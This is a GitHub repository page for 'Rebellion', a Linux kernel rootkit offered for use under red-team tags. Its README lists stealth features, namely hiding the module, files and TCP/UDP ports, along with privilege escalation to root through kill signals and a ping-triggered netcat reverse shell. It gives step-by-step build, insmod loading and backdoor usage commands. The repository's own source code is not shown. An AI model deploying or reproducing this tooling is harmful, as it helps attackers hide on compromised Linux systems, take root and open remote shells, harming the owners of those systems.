8000 GitHub - brosck/Rebellion: 「⚔️」Ring 0 Rootkit for Linux Kernels x86/x86_64 5.x/6.x
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content
/ Rebellion Public

「⚔️」Ring 0 Rootkit for Linux Kernels x86/x86_64 5.x/6.x

License

BSD-3-Clause license
23 stars 3 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

brosck/Rebellion

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
assets
assets
 
 
hooks
hooks
 
 
LICENSE
LICENSE
 
 
Makefile
 8000
Makefile
 
 
README.md
README.md
 
 
config.h
config.h
 
 
hooks.h
hooks.h
 
 
rebellion.c
rebellion.c
 
 

Repository files navigation

「⚔️」 About Rebellion

Rebellion is a sophisticated rootkit malware developed specifically for operating systems based on the Linux kernel in the x86 and x86_64 architecture in its 5.x/6.x versions. Rebellion has several features such as self hide/unhide, hide folder/file, hide TCP/UDP port, turning low-privilege users into root and backdoor via ping.

Note: Currently, the rootkit is going through a beta phase, where bugs, compilation failures, problems with architectures can be found. I ask that you collaborate with the development of the project to avoid as many problems as possible.

Features

Self hide/unhide

Rebellion has the ability to hide/unhide in the system using the kill -12 0 command.

Hide folder/file

Rebellion allows you to hide files and directories from a magic prefix defined as reb_ (config.h). Ex.: reb_operations/, reb_backdoor.elf.

Hide TCP/UDP port

Rebellion allows you to hide a TCP/UDP port on your system. The port is defined in the config.h file in the HIDE_PORT macro. Note: Only works for netstat and lsof commands. This is a part that is still under development.

User2Root

When running the kill -10 0 command with a low-privilege user, Rebellion adds their privileges to 0, making them a user with root permissions on the system.

Backdoor via ping

Rebellion has a feature that allows you to receive a reverse shell via netcat (it is important that it is installed) by sending an ICMP packet via ping to your IP and port defined in the config.h file in the macros YOUR_SRV_IP and YOUR_SRV_PORT.

Tested Kernel Versions

Distro Kernel Details
Debian GNU/Linux 12 (bookworm) 6.1.0-32-amd64 (2025-03-06) x86_64 GNU/Linux
Ubuntu 22.04 (Jammy Jellyfish) 5.15.0-25-generic Mar 30 15:54:22 UTC 2022 x86_64 GNU/Linux

Build & Run

git clone https://github.com/brosck/Rebellion
cd Rebellion
# edit config.h file
make
sudo insmod rebellion.ko

Usage

Self hide/unhide

kill -12 0

Hide folder/file

mkdir reb_operations
cd reb_operations
echo test > reb_test.txt

Hide TCP/UDP port

# edit HIDE_PORT macro in config.h
netstat -tunlp | grep 1234

User2Root

kill -10 0

Backdoor via ping

Target machine:

# edit YOUR_SRV_IP and YOUR_SRV_PORT macro in config.h and start LKM

Your machine (1º terminal):

nc -lnvp 1234

Your machine (2º terminal):

sudo ping -c 1 <TARGET IP>

Bugs and Improvements

If you have any suggestions for improvements or want to report a bug, feel free to create and report an issue or pull request, the aim is always to improve the tool with different features.

About

「⚔️」Ring 0 Rootkit for Linux Kernels x86/x86_64 5.x/6.x

Topics

rootkit ring0 offensive-security lkm redteam rebellion

Resources

Readme

License

BSD-3-Clause license
Activity

Stars

23 stars

Watchers

1 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages
0